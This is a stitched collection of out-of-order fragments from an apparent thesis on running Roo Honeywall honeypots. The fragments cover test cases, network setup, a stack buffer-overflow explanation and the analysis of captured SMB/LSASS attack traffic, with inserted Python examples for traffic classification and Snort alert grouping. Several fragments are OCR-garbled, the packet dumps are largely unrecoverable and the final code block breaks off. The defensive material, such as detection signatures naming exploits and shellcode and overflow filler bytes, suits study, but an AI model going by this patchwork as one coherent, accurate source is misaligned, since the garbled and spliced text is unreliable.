
Improving network security with Honeypots


Contents

1. [figure 3.2 protected environment: Internet; host with public IP; host with public IP or with private IP behind NAT (1)]
(1) NAT: Network Address Translation

3.3 Scenario III: public address

This scenario focuses on the IP address of the Honeypot. In this scenario the Honeypot is assigned a public address. The Internet Assigned Numbers Authority (IANA) maintains a database [IANA 05] which lists the publicly available address ranges; the earlier "Assigned Numbers" RFCs have been replaced by this database (RFC 3232). A public IP can be reached from any other public IP on the internet, i.e. IP datagrams addressed to a public IP are routed through the internet to the target. A public IP must be unique; it may not be assigned twice.

Applications on the Honeypot can communicate with the internet directly, because they know the public address of their host. This is in contrast to scenario IV, where an application on the Honeypot is not aware of the public IP. It is further possible to query the responsible Regional Internet Registry (RIR) for the name of the address holder; this is called a whois lookup. The Regional Internet Registries are:
AfriNIC (African Network Information Centre), Africa region, http://www.afrinic.net
APNIC (Asia Pacific Network Information Centre), Asia/Pacific region, http://www.apnic.net
ARIN (American Registry for Internet Numbers),
2. 3.2 Test Case 2: time intervals are normal
3.2.1 Purpose: verify that requirement R002 has been satisfied, i.e. the Honeypot and the Honeywall are still set to the correct time and date.
3.2.2 Setup / precondition: the basic setup has been done (see section 1.2). This test requires a watch.
3.2.3 Execution:
7. Wait 5 minutes after test case 1.
8. Check time and date on the Honeywall by entering the command date.
9. Verify that 5 minutes have elapsed. Pass / Fail
10. Check time and date on the Honeypot (Windows) by entering the commands date and time.
11. Verify that 5 minutes have elapsed. Pass / Fail
12. Check time and date on the Honeypot (Windows) by entering the commands date and time.
13. Verify that 5 minutes have elapsed. Pass / Fail
3.2.4 Verification: verify that R002 (time intervals are normal) is satisfied with steps 9, 11 and 13.
3.2.5 Results summary: Date, Time, Pass / Fail

3.3 Test Case 3: internal IP functionality
3.3.1 Purpose: verify that requirement R003 has been satisfied and the Honeypot is reachable within the internal IP network.
3.3.2 Setup / precondition: the basic setup has been done (see section 1.2). The attacker has an IP from the internal network. No other setup is necessary.
3.3.3 Execution:
14. The attacker pings the Honeypot by executing ping <hpIP>.
15. Observe that the attacker gets a minimum of fo
3. ... choose 4 (Honeywall configuration), then 3 (Remote Management), then 12 (Walleye); finally answer the question "Would you like to run the Walleye web interface?" with Yes. Walleye is the Honeynet Project's data analysis tool, based on Perl scripts and running on an Apache web server.

R009 Walleye is displaying correct time
Need: as stated in R001, correct time is important for proper data analysis.
Ex: in the early stages of beta testing there was a problem with time zones; the time zone in Walleye did not match.
Attain: this problem is fixed in Roo 1.0 hw-139. In case it happens again, consult the Honeynet web page at www.honeynet.org. If the time zone is set wrong, log in to Walleye, choose System Admin in the top tabs, in the administration menu choose Honeywall configuration / Honeynet demographics, on the Configure sensors page click edit, choose the correct time zone and apply the settings with Save. Even if the time on the operating system is correct, the time in Walleye needs to be checked. This requirement ensures that the time is synchronized with the underlying operating system.

R010 Walleye is displaying traffic from R001
Need: Walleye is parsing Snort's log files.
Ex: Walleye parses Snort's output to display flows. In some cases Walleye did not show any more traffic after a certain period. Here the Snort captures had to be analyzed manually to obtain results.
4. (Table of contents, continued)
3.1 ... 13
3.2 Scenario II: protected environment ... 14
3.3 Scenario III: public address ... 15
3.4 Scenario IV: private address ... 16
3.5 Scenario V: risk assessment ... 16
3.6 Scenario VI: Honeypot out of the box ... 17
3.7 Scenario VII: knowledge / education ... 21
4 Planning a Honeypot for FHD ... 23
4.1 Environment analysis ... 24
4.2 Evaluation of current solutions ... 25
4.3 Planning an experimental Honeypot ... 26
4.4 Implementing the Honeywall ... 32
4.5 (title not recoverable) ... 34
5 Running and observing the experiment ... 35
5.1 Requirements to a safe setup ... 35
5.2 (title not recoverable) ... 43
5.3 (title not recoverable) ... 52
5.4 Data analysis from Roo_Die and Roo_Mue ... 61
6 Summary ... 66
6.1 Improving the Honeypot ... 66
6.2 (title not recoverable) ... 67
6.3 Outlook to future research ... 68
A References
5. Dark addresses are of value because any packet sent to them is a possible attack and a subject for analysis.

Packets sent to dark IP addresses can be categorized into three categories: scanning or malicious traffic, broken or misconfigured traffic, and backscatter. As said before, misconfigured traffic should be avoided at all cost; this reduces false alerts from the Honeypot.

In physics, backscatter is the reflection of light, radar, radio or other electromagnetic waves directly back to the direction they came from. In networking, backscatter is the reflection of packets. When an attacker scans a computer he often hides his own IP by performing multiple scans with false (spoofed) source addresses. That way it is more difficult for the victim to determine where the attack actually came from. A spin-off of those attacks are the reply packets (for example ICMP messages) that the victim sends to the false addresses; they are routed back to the false origin, which may well be a dark address. Backscatter analysis is important for projects analyzing worm outbreaks and other internet threat monitoring. A project analyzing backscatter traffic is the Domino project of the University of Wisconsin-Madison [Yegneswaran 04].

3 Honeypots in the field of application

This chapter categorizes the fields of application of Honeypots. It investigates different environments and explains their individual attributes. Five scenarios have been developed to separa
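The three categories above can be applied mechanically to traffic captured at a dark address range. The following is an added example, not code from the thesis: it classifies constructed packet records with simple heuristics (a reply-type TCP segment or an ICMP error arriving at an address that never sent anything is backscatter, a lone SYN or echo request is a scan, UDP to a typical service port is treated as a misconfigured client). The flag sets, the UDP port list and the sample packets are assumptions chosen for illustration.

```python
"""Sort packets that arrive at dark (unused) addresses into the three
categories the text names: scanning/malicious, broken/misconfigured and
backscatter.  Added example, not code from the thesis; the heuristics and
the packet records below are constructed for illustration."""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    proto: str           # "tcp", "udp" or "icmp"
    flags: str = ""      # TCP flags as letters, e.g. "S", "SA", "RA"
    dport: int = 0
    icmp_type: int = -1
    payload_len: int = 0


# Assumption: nothing ever originates from the dark range, so any reply-type
# packet arriving there must answer a request that carried a spoofed source.
BACKSCATTER_TCP_FLAGS = {"SA", "RA", "R"}
BACKSCATTER_ICMP_TYPES = {0, 3, 11}      # echo reply, unreachable, time exceeded
# Assumption: UDP with payload to these service ports is most often a stale
# or mistyped client configuration (old DNS/NTP/SNMP/syslog server).
MISCONFIG_UDP_PORTS = {53, 123, 161, 514}


def classify(pkt: Packet) -> str:
    if pkt.proto == "tcp":
        if pkt.flags in BACKSCATTER_TCP_FLAGS:
            return "backscatter"          # reply to a SYN someone spoofed as us
        return "scan"                     # SYN, ACK, FIN probes: unsolicited
    if pkt.proto == "icmp":
        if pkt.icmp_type in BACKSCATTER_ICMP_TYPES:
            return "backscatter"
        return "scan"                     # echo request, timestamp request, ...
    if pkt.proto == "udp":
        if pkt.dport in MISCONFIG_UDP_PORTS and pkt.payload_len > 0:
            return "misconfigured"
        return "scan"
    return "scan"


def summarize(packets) -> Counter:
    """Count packets per category; input order does not matter."""
    return Counter(classify(p) for p in packets)


# Constructed sample traffic seen at the dark range 203.0.113.0/24.
SAMPLE = [
    Packet("198.51.100.7", "203.0.113.10", "tcp", flags="S", dport=445),
    Packet("198.51.100.7", "203.0.113.10", "tcp", flags="S", dport=139),
    Packet("192.0.2.80", "203.0.113.11", "tcp", flags="SA", dport=3122),
    Packet("192.0.2.81", "203.0.113.11", "tcp", flags="RA", dport=3123),
    Packet("192.0.2.9", "203.0.113.12", "icmp", icmp_type=3),
    Packet("198.51.100.50", "203.0.113.13", "udp", dport=53, payload_len=40),
    Packet("198.51.100.51", "203.0.113.14", "udp", dport=1434, payload_len=376),
    Packet("198.51.100.8", "203.0.113.10", "icmp", icmp_type=8),
]

if __name__ == "__main__":
    for p in SAMPLE:
        print(f"{p.src:>15} -> {p.dst:<14} {p.proto:<4} {p.flags:<2} {classify(p)}")
    print(dict(summarize(SAMPLE)))
```

The per-category counts are what an operator wants to track over time: a rising backscatter share points at a spoofed-source attack elsewhere on the internet, while misconfigured traffic should be traced to its source and fixed so it stops producing false alerts.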
6. North America region, http://www.arin.net
LACNIC (Regional Latin American and Caribbean IP Address Registry), Latin America and some Caribbean islands, http://lacnic.net/en/index.html
RIPE NCC (Réseaux IP Européens Network Coordination Centre), Europe, the Middle East and Central Asia, http://www.ripe.net

3.4 Scenario IV: private address

This scenario also focuses on the IP address of the Honeypot. In this scenario the Honeypot is assigned a private address. Private addresses are specified in RFC 1918. In contrast to public addresses, private IPs cannot be addressed from the internet: packets with private destination addresses are discarded by internet gateways (routers). To connect to a private address, the host needs to be located within the same address range, or it needs a gateway with a route to the target network. The Internet Assigned Numbers Authority (IANA) reserved three blocks of IP addresses, namely 10.0.0.0/8, 172.16.0.0/12 and 192.168.0.0/16, for private internets.

For interconnecting private and public networks an intermediate device is used. That device needs to implement Network Address Port Translation (NAPT, RFC 3022). NAPT translates many internal IP addresses and their ports to a single public IP and a set of ports. This hides the addresses of the internal network behind a single public IP. Outbound access is transparent to most applications. Unfortunately so
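The reachability consequence of scenario IV follows directly from how a NAPT table is built: only outbound packets create mappings, so a Honeypot with an RFC 1918 address is invisible to unsolicited probes unless the gateway is configured to forward them. The following toy translation table is an added example, not code from the thesis or from any NAPT implementation; the public address 203.0.113.5, the port range starting at 40000 and the hosts involved are constructed (documentation ranges), and the Honeypot address 192.168.10.39 is the one the thesis setup uses.

```python
"""Toy Network Address Port Translation (NAPT, RFC 3022) table.

Added example, not code from the thesis.  It shows the behaviour scenario IV
relies on: an inside host with an RFC 1918 address reaches the internet
transparently, while a packet from the internet can only reach it through a
mapping that an earlier outbound packet created.  Public address, ports and
outside hosts below are constructed (documentation ranges)."""
import ipaddress
from itertools import count

RFC1918 = [ipaddress.ip_network(n) for n in
           ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_private(addr: str) -> bool:
    """True only for the three RFC 1918 blocks (ipaddress's own is_private
    would also accept loopback, link-local and 100.64/10, which is not what
    the text means by 'private address')."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in RFC1918)


class Napt:
    def __init__(self, public_ip: str = "203.0.113.5", first_port: int = 40000):
        self.public_ip = public_ip
        self._ports = count(first_port)          # next free public port
        self.out = {}    # (inside_ip, inside_port) -> public_port
        self.back = {}   # public_port -> (inside_ip, inside_port)

    def outbound(self, src_ip, src_port, dst_ip, dst_port):
        """Inside -> outside: rewrite the source; first use creates a mapping."""
        if not is_private(src_ip):
            raise ValueError(f"{src_ip} is not an inside (RFC 1918) address")
        key = (src_ip, src_port)
        if key not in self.out:
            pub = next(self._ports)
            self.out[key] = pub
            self.back[pub] = key
        return (self.public_ip, self.out[key], dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_port):
        """Outside -> inside: rewrite the destination if a mapping exists.
        None means 'no mapping': the gateway drops the packet, so an
        unsolicited probe never reaches the Honeypot."""
        inside = self.back.get(dst_port)
        if inside is None:
            return None
        return (src_ip, src_port, inside[0], inside[1])


def demo():
    napt = Napt()
    # the Honeypot (192.168.10.39 in the thesis setup) fetches a web page
    out = napt.outbound("192.168.10.39", 1025, "192.0.2.10", 80)
    # the server's answer to the translated port is delivered to the Honeypot
    reply = napt.inbound("192.0.2.10", 80, out[1])
    # an attacker probing port 445 of the public address finds no mapping
    probe = napt.inbound("198.51.100.7", 4654, 445)
    return out, reply, probe


if __name__ == "__main__":
    for step, result in zip(("outbound", "reply", "probe"), demo()):
        print(f"{step:<9} {result}")
```

Two inside hosts using the same source port receive different public ports, which is the "port" part of NAPT; a real gateway would additionally age mappings out and, in the stricter variants, check that the outside source matches the host the mapping was created for.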
7. layer | protocols
application layer | HTTP, SMTP, POP3, SNMP, RIP
internet layer | IPv4
link layer | Ethernet, Token Ring, WLAN
figure 5.3 protocol stack

A connection from the internet via IP requires two things: an internet address (IP) and a port bound on that IP. The address enables the connection to the host on the network, and the port number allows the data (the payload of the IP datagram) to be delivered to a process on the target machine. The process then handles the information and, depending on its nature, performs actions. Networking processes are the main target for hackers. They can be of the following types:

process type | description | security privileges
system (kernel process) | Allows the kernel (13) to access the network and vice versa. On Microsoft Windows operating systems it handles NETBIOS (RFC 1002) endpoints next to system-related functions. | system context
figure 5.4 possible networking processes

(13) Kernel: the kernel is the fundamental part of an operating system. It is the software responsible for providing secure access to the machine's hardware for the various computer programs. It is loaded first, before any other program.
NETBIOS: Network Basic Input/Output System. It generally refers to a programming API for local network communication.

process type | description | security privileges
service | A service (Windows term) or da
8. [Appendix B packet dump, continued: payload bytes consisting of repeated 0x41 ('A'); no other fields recoverable from the extraction]
9. E El snapshot ki Des roo 134 State Powered off Guest OS Other Linux 2 6 x kernel Configuration file E VMware Images roo 134 other26x linux vmx Version Current virtual machine for VMware Workstation 4 5 2 Commands Devices gt Start this virtual machine amp Memory 256 MB SS Hard Disk 1 SCSI 0 CD ROM 1 IDE 1 0 Using image C Vtemptroo 2 roo 1 0 b 134 is0 Floppy 1 Using drive A ENIC 1 Bridged ENIC 2 Host only ENIC 3 Host only USB Controller Present Edit virtual machine settings Notes Type here to enter notes for this virtual machine figure 3 neuerzeugte VMware On main menu Edit Virtual network settings Automatic bridging uncheck automatic bridging Host virtual network mapping VMnet0 the host s NIC VMnet1 VMware Network Adapter VMnet1 VMnet8 VMware Network Adapter VMnet8 DHCP remove all NICs Stop Service Apply Page B 42 Improving network security with Honeypots 6 NAT VMnet host disable Stop service apply Finally you have to remove protocol bindings of the host s operating system Otherwise the connection between Honeypot and Honeywall might be polluted by the host It also secures the host as it is not possible to attack it via IP protocol 1 control panel 2 network connections 3 local network connection remove all bindings except for VMware bridge protocol lt 4 Eigenschaften von lokale Netzwerkverbindung Allgemein Authentifizierung
10. [figure 4 settings on host NIC: dialog "Properties of Local Area Connection", tabs General / Authentication / Advanced; Connect using: 3Com EtherLink 10/100 PCI Combo NIC; This connection uses the following items: Client for Microsoft Networks (unchecked), VMware Bridge Protocol (checked), File and Printer Sharing for Microsoft Networks (unchecked), Internet Protocol (TCP/IP) (unchecked); buttons Install / Uninstall / Properties; Description: Allows access to resources on a Microsoft network; Show icon in notification area when connected; Notify me when this connection has limited or no connectivity]

4. VMnet1: remove all bindings.

[figure 5 VMnet1 settings: dialog "Properties of VMware Network Adapter VMnet1", Connect using: VMware Virtual Ethernet Adapter for VMnet1; all items unchecked: Client for Microsoft Networks, VMware Bridge Protocol, File and Printer Sharing for Microsoft Networks, Internet Protocol (TCP/IP)]

5. VMnet8: remove all bindings except for the IP protocol e
11. The installation process will wipe the entire disk. To boot from CD, change the boot order in your computer's BIOS and insert the CD. Roo is installed automatically without user interaction. Remove the CD when completed. Online manual: http://www.honeynet.org/tools/cdrom/Roo/manual/2-require.html

After installation you will be prompted with a login. Note that it is not possible to log in as root directly. Log in as roo instead and enter su to gain root privileges. The default password for both accounts is honey; change both passwords before the Honeywall is connected to any network. The command menu opens a text dialog menu which queries the most important information and activates the Honeywall. Some config options have to be created manually, i.e. the files fencelist.txt, blacklist.txt and whitelist.txt. To start with the initial configuration select option 4, Honeywall configuration. You can choose to use default values, enter the information individually, or load a pre-defined config file (honeywall.conf).

Important: honeywall.conf is ONLY used during setup; it does not store variables in an active system. During operation the variables are stored in hw.conf.

3 VMware installation
These installation instructions require that the source CD is available as an iso image. You can download this image directly from honeynet.org.
3.1 System requirements: CPU Pentium
12. figure 5.2 internet architecture (extracted from RFC 1122)

Transport layer: the transport layer provides end-to-end communication services for applications. Currently there are two primary transport layer protocols: the Transmission Control Protocol (TCP) and the User Datagram Protocol (UDP). TCP is a reliable, connection-oriented transport service that provides end-to-end reliability, resequencing and flow control. UDP is a connectionless datagram transport service.

Internet layer: all internet transport protocols use the Internet Protocol (IP) to carry data from the source host to the destination host. IP is a connectionless, or datagram, internetwork service providing no end-to-end delivery guarantees. Thus IP datagrams may arrive at the destination host damaged, duplicated, out of order, or not at all. The layers above IP are responsible for reliable delivery service when it is required. The IP protocol includes provisions for addressing, type-of-service specification, fragmentation and reassembly, and security information.

Link layer: to communicate on its directly connected network, a host must implement the communication protocol used to interface to that network. We call this a link layer or media access layer protocol.

figure 5.2 internet architecture (continued)

The layers are summarized in the protocol stack
13. ... here it is 0x1234. The subroutine also needs memory to store its variables a, b and c. Therefore the stack is extended by the needed size, and the addresses 0xFF3A, 0xFF1C and 0xFF14 are reserved for a, b and c. The stack base pointer (4) indicates the end of the stack and is updated according to the new stack size. After these operations are finished the jump instruction can be executed and processing of the subroutine's code begins (5). The end of the subroutine contains instructions to write the return address 0x1234 to the instruction pointer, free the memory used by a, b and c, and jump back to 0x1234 (6). After the jump back to the main program, the code following the call is executed (7).

Vulnerability: memory management
The general vulnerability lies in memory management. Many programming languages such as C and C++ do not check whether write and read instructions stay within their reserved memory area. This can be used to create a buffer overflow. The example in figure 5.5 shows that the variables are stored after the return address and the stack base pointer. They are stored from the top to the bottom of the stack. Memory is reserved according to their definition: char a[4] takes 4 bytes, char b[30] takes 30 bytes and double c takes 8 bytes. As long as the routine stores at most 29 bytes into b (the 30th byte has to be a binary 0, 0x00, to mark the end of the string), execution continues normally.
14. ... installations is only depending on the network settings.

For each setup a setup instruction sheet was used to note the individual settings. That sheet was available for the predecessor of Roo (Eeyore) and has been updated for Roo. The new version can be found in the appendix (see B.3). It covers settings for the mode of the firewall, the remote management interface, outbound control limits, alerting and the Sebek setup. Its primary purpose is to ensure that setup details can be accessed later when analyzing the results. Both Honeywalls were set to bridge mode and provided a management interface. At FHD the management interface was accessed through the host computer.

4.4.1 Roo's components
Roo 139 is based on Fedora Core 3 (Linux). Roo uses the following applications to control and contain hacker activity:

Component | Description
snort_inline | Snort_inline is basically a modified version of Snort that accepts packets from iptables (see below). It then uses new rule types (drop, sdrop, reject) to tell iptables whether the packet should be dropped, rejected, modified or allowed to pass, based on a Snort rule set. It is an Intrusion Prevention System (IPS) that uses existing Intrusion Detection System (IDS) signatures to make decisions on packets that traverse snort_inline.
session limit | A modification to the OpenBSD pf firewall tool. Gives rate/session limiting cap
15. ... 3.4 (external IP functionality); R004 needs to be satisfied according to 3.4.4.
3.5.3 Execution:
22. Execute nslookup www.google.com on the attacker.
23. Observe that the attacker gets a DNS reply. Pass / Fail
24. Execute nslookup www.google.com on the Honeypot.
25. Verify that the Honeypot gets a DNS reply with the same IP(s) as in step 23. Pass / Fail
3.5.4 Verification: verify that R005 (DNS functionality) is satisfied with step 25.
3.5.5 Results summary: Date, Time, Pass / Fail

3.6 Test Case 6: restricted access for Honeypot
3.6.1 Purpose: verify that requirement R006 has been satisfied and the Honeypot is not able to reach restricted addresses according to fencelist.txt.
3.6.2 Setup / precondition: the setup is the same as in 3.3 (internal IP functionality); R003 needs to be satisfied according to 3.3.4.
3.6.3 Execution: the execution needs to be repeated for every single IP in fencelist.txt. If a network address is defined in fencelist.txt, the repetition should include at least three IPs of that network range.
26. Execute ping <blIP> on the Honeypot.
27. Verify that the Honeypot gets no reply, i.e. the ping displays a timeout. Pass / Fail
3.6.4 Verification: verify that R006 (restricted access for Honeypot) is satisfied with step 27.
3.6.5 Results summary: Date, Time, Pass / Fail
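Test case 6 is the one most worth scripting, because a fencelist with network entries quickly produces more ping targets than a tester wants to pick by hand and a single forgotten production host defeats the purpose of the Honeywall. The following is an added example, not code from the thesis or from Roo: it parses a fencelist, answers whether a destination is fenced, picks the first, middle and last usable address of every network entry (at least three, as step 26 requires) and maps the observed ping result onto the Pass/Fail of step 27. The one-entry-per-line format with '#' comments and the sample entries are assumptions; Roo's actual fencelist syntax is not shown on this page.

```python
"""Fencelist check for test case 6 (restricted access for the Honeypot).

Added example, not code from the thesis or from Roo.  Parses a fencelist,
decides whether a destination is fenced, picks the addresses to ping per
entry and turns the observed result into the Pass/Fail of step 27.  The
file format and the sample entries are assumptions."""
import ipaddress

# constructed sample: production addresses the Honeypot must never reach
SAMPLE_FENCELIST = """\
# fencelist.txt (constructed)
198.51.100.0/24      # example production subnet
192.168.10.1         # example management host
10.0.0.0/8
"""


def parse_fencelist(text):
    """Return the entries as ip_network objects (a bare host becomes a /32)."""
    nets = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if line:
            nets.append(ipaddress.ip_network(line, strict=False))
    return nets


def is_fenced(ip: str, nets) -> bool:
    """True if the destination falls into any fencelist entry."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in nets)


def ping_targets(nets):
    """Addresses to ping per entry: a single host as is; for a network the
    first, middle and last usable address, which gives the three samples the
    test case asks for and exercises both ends of the range."""
    targets = {}
    for net in nets:
        if net.num_addresses == 1:
            targets[str(net)] = [str(net.network_address)]
            continue
        picks = [net.network_address + 1,
                 net.network_address + net.num_addresses // 2,
                 net.broadcast_address - 1]
        targets[str(net)] = [str(p) for p in picks]
    return targets


def verdict(ip: str, got_reply: bool, nets) -> str:
    """Step 27: a fenced destination must time out; any reply is a failure."""
    if not is_fenced(ip, nets):
        return "not applicable"
    return "Fail" if got_reply else "Pass"


if __name__ == "__main__":
    nets = parse_fencelist(SAMPLE_FENCELIST)
    for entry, hosts in ping_targets(nets).items():
        for h in hosts:
            print(f"step 26: ping {h:<16} (fencelist entry {entry})")
```

The same is_fenced check can be run against the Honeypot's observed outbound connections later on: a flow from the Honeypot to a fenced address that did complete is a data-control failure, regardless of what the ping test showed on setup day.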
16. [Appendix B, page B-23: packet dump; payload bytes largely repeated 0x43 ('C'); the remaining header fields are garbled beyond recovery]
17. [Appendix B packet dump, continued: payload bytes consisting of repeated 0x44 ('D'); no other fields recoverable from the extraction]
18. [Appendix B packet dump: Ethernet frame, type 0x800, len 0x5B5; TCP segment from 192.168.10.39, IpLen 20, DgmLen 1447, DF set, Seq 0x5146280F, Ack 0x2B47D99A, Win 0xFCC7, TcpLen 20; payload bytes largely repeated 0x43 ('C'); remaining fields garbled beyond recovery]
19. ... 80 are 92% unsuccessful scans. The remaining 8% were used to download binary data of 120 kB to the Honeypot. Unfortunately the payload does not show any recognizable pattern, so this would also require intensive exploration in the future.
(19) The TFTP Get message initiates a download.

6 Summary
6.1 Improving the Honeypot
Analyzing the data consumes a lot of time. Often patterns of attacks are repeated; especially attacks of worms are repeated continuously. A Honeynet operator should carefully inspect every flow to avoid missing the attacks which show new patterns. The difficulty is that an attack can consist of more than one Snort alert. So an advanced attack detector would have to analyze the sequence of alerts per flow and compare them with other attacks to find duplicates. A drastic improvement in speeding up the analysis would be to summarize similar attacks in one entry and show only the number of appearances.

[figure 6.1 flow with multiple alerts: June 12th 20:08:26, 84.58.138.242 -> 192.168.10.49, 2 kB, 21 pkts; alerts: NETBIOS SMB-DS IPC$ unicode share access; SHELLCODE x86 0x90 unicode NOOP; NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt; OS unknown; unknown signature]

Further to that, it saves even more time if those well-known attacks are not even a
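The summarization proposed in 6.1 is straightforward to implement on Snort's alert log: group alerts by flow, treat the ordered sequence of alert messages of a flow as the attack's pattern, and report each distinct pattern once with the number of flows that produced it. The following is an added example, not code from the thesis or from Walleye. The alert lines are constructed in Snort's "fast" output format around the three signatures of figure 6.1; their rule IDs (1:100001 and following) are placeholders from the local-rule range, not Snort's real SIDs for these signatures, and the second attacking host and the single-alert flow are made up to show a duplicate and a non-duplicate.

```python
"""Collapse repeated multi-alert attacks into one entry with a count.

Added example, not code from the thesis or from Walleye.  Alert lines are
constructed in Snort's 'fast' format; the rule IDs are placeholders from the
local-rule range, not Snort's SIDs for these signatures."""
import re
from collections import Counter, defaultdict

ALERT_RE = re.compile(
    r"^(?P<ts>\S+)\s+\[\*\*\]\s+\[(?P<sid>[\d:]+)\]\s+(?P<msg>.*?)\s+\[\*\*\]"
    r".*?\{(?P<proto>\w+)\}\s+"
    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)\s*$")

SAMPLE_ALERTS = """\
06/12-20:08:26.104511  [**] [1:100001:1] NETBIOS SMB-DS IPC$ unicode share access [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 84.58.138.242:3122 -> 192.168.10.49:445
06/12-20:08:27.331902  [**] [1:100002:1] SHELLCODE x86 0x90 unicode NOOP [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 84.58.138.242:3122 -> 192.168.10.49:445
06/12-20:08:27.332417  [**] [1:100003:1] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 84.58.138.242:3122 -> 192.168.10.49:445
06/12-21:14:02.771003  [**] [1:100001:1] NETBIOS SMB-DS IPC$ unicode share access [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 198.51.100.9:4020 -> 192.168.10.49:445
06/13-03:40:11.002116  [**] [1:100001:1] NETBIOS SMB-DS IPC$ unicode share access [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 84.58.140.5:1067 -> 192.168.10.49:445
06/13-03:40:12.519840  [**] [1:100002:1] SHELLCODE x86 0x90 unicode NOOP [**] [Classification: Executable code was detected] [Priority: 1] {TCP} 84.58.140.5:1067 -> 192.168.10.49:445
06/13-03:40:12.520277  [**] [1:100003:1] NETBIOS SMB-DS DCERPC LSASS DsRolerUpgradeDownlevelServer exploit attempt [**] [Classification: Attempted Administrator Privilege Gain] [Priority: 1] {TCP} 84.58.140.5:1067 -> 192.168.10.49:445
"""


def parse_alerts(text):
    """Parse fast-format lines; blank or unparseable lines are skipped."""
    alerts = []
    for line in text.splitlines():
        m = ALERT_RE.match(line.strip())
        if m:
            alerts.append(m.groupdict())
    return alerts


def group_by_flow(alerts):
    """One connection = (proto, src, sport, dst, dport); keeps alert order."""
    flows = defaultdict(list)
    for a in alerts:
        key = (a["proto"], a["src"], a["sport"], a["dst"], a["dport"])
        flows[key].append(a["msg"])
    return flows


def attack_patterns(flows):
    """Count flows per ordered alert sequence: the duplicate detector."""
    return Counter(tuple(msgs) for msgs in flows.values())


def report(patterns):
    """One line per distinct pattern, most frequent first."""
    return [f"{n:>4} x  " + "  >  ".join(seq)
            for seq, n in patterns.most_common()]


if __name__ == "__main__":
    flows = group_by_flow(parse_alerts(SAMPLE_ALERTS))
    print("\n".join(report(attack_patterns(flows))))
```

Keying on the exact ordered sequence is deliberately strict: a worm variant that drops or reorders one step shows up as a new pattern, which is exactly the case the operator must not miss. Looser grouping (by signature set, ignoring order) can be layered on top once the strict groups are understood.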
20. ... CIFS implementation in Windows operating systems, only a technical reference about the protocol [Microsoft 02]. CIFS uses the SMB protocol directly over TCP/IP [Microsoft 03].

An inspection of the first flow shows that this was a probe to determine whether the port is accessible. A TCP connection was established with a handshake as specified in RFC 793 and immediately closed. This is called a connect scan [Honeynet 04].

No. | Time | Source | Destination | Proto | Info
1 | 0.000000 | 84.58.107.92 | 192.168.10.39 | TCP | 4654 > microsoft-ds [SYN] Seq=0 Ack=0 Win=64600 Len=0 MSS=...
2 | 0.000658 | 192.168.10.39 | 84.58.107.92 | TCP | microsoft-ds > 4654 [SYN, ACK] Seq=0 Ack=1 Win=17280 Len=0
3 | 0.653302 | 84.58.107.92 | 192.168.10.39 | TCP | 4654 > microsoft-ds [ACK] Seq=1 Ack=1 Win=64800 Len=0
4 | 0.655178 | 84.58.107.92 | 192.168.10.39 | TCP | 4654 > microsoft-ds [FIN, ACK] Seq=1 Ack=1 Win=64800 Len=0
5 | 0.655608 | 192.168.10.39 | 84.58.107.92 | TCP | microsoft-ds > 4654 [FIN, ACK] Seq=1 Ack=2 Win=17280 Len=0
6 | ?.339241 | 84.58.107.92 | 192.168.10.39 | TCP | 4654 > microsoft-ds [ACK] Seq=2 Ack=2 Win=64800 Len=0
figure 5.14 probe connection

The second flow is marked with the Snort alert SHELLCODE x86 inc ebx NOOP (see the beginning of 5.2.2 for the definition of shellcode). A rule evaluation for this flow shows the full details of this alert:
06/23-17:35:53.186615 [**] SHELLCODE x86 inc ebx NOOP [**] [Classification: Executable code was detected] [Priorit
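The judgement "probe, not an attack" made above from figure 5.14 rests on three observable facts: the handshake completed, no payload was exchanged, and the client closed the connection right away. Those facts can be checked mechanically for every flow in a capture. The following is an added example, not code from the thesis: the first sample flow reproduces the six segments of figure 5.14 (flags and zero payload as shown there); the half-open scan, the session with data and the closed-port probe, as well as the classification rules themselves, are constructed.

```python
"""Tell a connect scan from a real session by replaying the TCP segments of
one flow.  Added example, not code from the thesis.  PROBE reproduces the
six-packet flow of figure 5.14; the other flows and the rules are
constructed."""


def classify_tcp_flow(segments):
    """segments: list of (src, dst, flags, payload_len) in capture order,
    flags as letters (S, A, F, R, P).  Returns one of 'connect scan',
    'half-open scan', 'refused', 'session' or 'incomplete'."""
    if not segments:
        return "incomplete"
    client, server, first, _ = segments[0]
    if "S" not in first or "A" in first:
        return "incomplete"              # flow did not start with a client SYN
    payload = sum(n for *_, n in segments)
    from_client = [f for s, _, f, _ in segments if s == client]
    from_server = [f for s, _, f, _ in segments if s == server]
    synack = "SA" in from_server
    handshake = synack and len(from_client) > 1 and from_client[1] == "A"
    if payload > 0:
        return "session"                 # data crossed the wire: not a mere probe
    if not synack and any("R" in f for f in from_server):
        return "refused"                 # closed port answered with RST
    if synack and not handshake and any("R" in f for f in from_client):
        return "half-open scan"          # SYN, SYN/ACK, RST: never completed
    if handshake and any("F" in f for f in from_client):
        return "connect scan"            # full handshake, no data, client closes
    return "incomplete"


A, B = "84.58.107.92", "192.168.10.39"

# figure 5.14: handshake, immediate FIN from the scanner, no payload
PROBE = [(A, B, "S", 0), (B, A, "SA", 0), (A, B, "A", 0),
         (A, B, "FA", 0), (B, A, "FA", 0), (A, B, "A", 0)]
# constructed: SYN scan that tears down with RST before completing
HALF_OPEN = [(A, B, "S", 0), (B, A, "SA", 0), (A, B, "R", 0)]
# constructed: same handshake, then an SMB request and reply
SESSION = PROBE[:3] + [(A, B, "PA", 137), (B, A, "PA", 93)] + PROBE[3:]
# constructed: probe of a closed port
CLOSED = [(A, B, "S", 0), (B, A, "RA", 0)]

if __name__ == "__main__":
    for name, flow in (("probe", PROBE), ("half-open", HALF_OPEN),
                       ("session", SESSION), ("closed", CLOSED)):
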